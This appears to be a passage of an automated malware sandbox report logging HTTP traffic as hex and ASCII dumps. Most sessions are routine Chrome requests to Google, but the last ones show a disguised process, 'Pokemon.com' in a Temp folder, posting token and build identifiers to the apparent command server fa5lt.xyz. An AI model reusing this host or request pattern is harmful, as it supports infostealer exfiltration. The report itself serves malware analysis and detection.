                                                                                                                                                                                                                                                                                    Data Ascii: 54xZFdsZ0FvdDVEYUx3blV0N0tjVHdNUGgzajhxUXlsRm1wWlpaU2JLTFgvZUtTK1psc1Rmd1U2RHpzZHg2dm9
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 35 39 61 0d 0a 6a 4d 31 55 72 52 6b 78 50 57 54 52 6d 56 30 4a 73 62 56 4e 54 4d 54 46 57 64 33 42 4a 57 6d 5a 42 4e 31 63 34 64 32 5a 54 52 46 6c 61 56 54 5a 46 54 31 42 34 59 7a 42 59 54 6e 4a 76 56 30 4e 6f 62 33 68 54 63 53 74 69 54 56 5a 75 4e 48 5a 74 51 33 52 79 53 32 78 35 65 6e 70 61 65 6d 46 51 65 58 4a 6c 65 57 6f 77 51 58 4e 4a 65 6e 49 31 62 54 4a 36 4d 6d 4e 5a 63 6b 52 71 61 47 70 71 4e 6d 5a 75 64 57 4e 76 4e 6c 5a 59 62 6c 70 71 63 32 4a 49 62 45 56 57 62 44 56 50 53 31 68 59 57 54 4a 75 56 47 52 4f 57 6c 52 4a 57 45 70 47 65 6e 70 51 56 7a 46 6f 4f 54 52 4d 52 6c 68 44 56 45 56 6a 4d 6c 68 73 4e 47 35 47 52 6e 6b 78 64 6a 64 56 64 6e 56 50 53 32 64 59 62 45 5a 58 55 47 51 32 4d 6d 64 6a 5a 58 56 6f 64 6d 6c 6d 4d 47 31 77 5a 45 4a 55 51
                                                                                                                                                                                                                                                                                    Data Ascii: 59ajM1UrRkxPWTRmV0JsbVNTMTFWd3BJWmZBN1c4d2ZTRFlaVTZFT1B4YzBYTnJvV0Nob3hTcStiTVZuNHZtQ3RyS2x5enpaemFQeXJleWowQXNJenI1bTJ6MmNZckRqaGpqNmZudWNvNlZYblpqc2JIbEVWbDVPS1hYWTJuVGROWlRJWEpGenpQVzFoOTRMRlhDVEVjMlhsNG5GRnkxdjdVdnVPS2dYbEZXUGQ2MmdjZXVodmlmMG1wZEJUQ
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC51INData Raw: 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: NTITY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    9192.168.2.549815142.250.181.684432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:00 GMT
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC372INData Raw: 32 62 61 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                    Data Ascii: 2baa)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                    Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                    Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                    Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                    Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 39 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                                                    Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700299,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72
                                                                                                                                                                                                                                                                                    Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33
                                                                                                                                                                                                                                                                                    Data Ascii: rn a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1084INData Raw: 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                    Data Ascii: 3d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC425INData Raw: 31 61 32 0d 0a 28 74 79 70 65 6f 66 20 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 65 29 3a 65 29 7d 66 6f 72 28 6c 65 74 20 65 5c 75 30 30 33 64 32 3b 65 5c 75 30 30 33 63 63 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 63 6f 6e 73 74 20 66 5c 75 30 30 33 64 63 5b 65 5d 3b 21 5f 2e 24 64 28 66 29 7c 7c 5f 2e 48 62 28 66 29 5c 75 30 30 32 36 5c 75 30 30 32 36 66 2e 6e 6f 64 65 54 79 70 65 5c 75 30 30 33 65 30 3f 64 28 66 29 3a 5f 2e 61 63 28 66 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 66 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 66 2e 69 74 65 6d 5c
                                                                                                                                                                                                                                                                                    Data Ascii: 1a2(typeof e\u003d\u003d\u003d\"string\"?a.createTextNode(e):e)}for(let e\u003d2;e\u003cc.length;e++){const f\u003dc[e];!_.$d(f)||_.Hb(f)\u0026\u0026f.nodeType\u003e0?d(f):_.ac(f\u0026\u0026typeof f.length\u003d\u003d\"number\"\u0026\u0026typeof f.item\


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    10192.168.2.549816142.250.181.684432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:01 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:00 GMT
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:01 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    11192.168.2.549839116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:05 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----5PP8Q9ZUA1NYMY5FCTR1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 505
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:05 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------5PP8Q9ZUA1NYMY5FCTR1Cont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    12192.168.2.549846116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:06 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----N7YMYCBSR1N7YUAS2V3O
